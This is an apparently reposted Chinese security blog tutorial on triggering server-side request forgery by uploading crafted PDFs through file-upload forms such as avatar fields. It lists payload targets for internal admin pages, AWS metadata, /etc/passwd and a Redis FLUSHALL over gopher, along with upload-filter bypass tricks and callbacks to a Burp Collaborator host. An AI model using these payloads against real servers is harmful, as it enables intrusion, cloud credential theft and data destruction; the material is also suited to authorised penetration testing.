•PDF 几乎总是被列入上传过滤器的白名单中。
•它是服务器端呈现或转换的可信文件类型。
•PDF 可以嵌入触发出站请求的外部对象(图像、链接)。
1. 工具设置
使用类似malicious-pdf的工具将有效载荷注入PDF。
./恶意pdf.py<your-burp-collaborator-url>
它会生成如下文件:
•测试1.pdf
•测试2.pdf
•test3.pdf
每个都携带不同的 SSRF 有效载荷向量。
2.上传流程
使用任意上传功能上传文件:
<form>
头像: <输入类型=“文件”名称=“头像”/>
</form>
上传 test3.pdf 作为头像——利用解析或转换文件的系统。
3. 触发与监控
如果后端呈现或扫描文件,则有效载荷就会触发。
监控方式:
•Burp 合作者
•Interactsh
•自定义 DNS 记录器
寻找:
•DNS pingback
•来自内部 IP 的 HTTP 回调
4. 确认
当 Burp 记录日志时,您就进入了:
类型:DNS/HTTP
有效载荷:[email protected]
IP:91.73.xx
这证实了 SSRF——后端从内部发出了请求。
有效载荷变体
测试多个 SSRF 路径:
http://127.0.0.1/admin
http://169.254.169.254/latest/meta-data/
文件:/// etc/passwd
gopher://127.0.0.1:6379/_FLUSHALL
嵌入 PDF 对象
使用:
•/XObject 用于图像
•/URI 注释
•/RichMedia 对象
•JavaScript 操作
绕过技巧
•双扩展名:avatar.pdf.png
•混淆IP地址:http://0x7f000001
•基于流的有效载荷,可实现更深层次的逃避
使用案例
•云 SSRF → AWS 元数据窃取
•内部管理面板发现
•IP/服务指纹识别
•链式 Redis → RCE 攻击
原文始发于微信公众号(TtTeam):利用 PDF 漏洞进行高级 SSRF
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论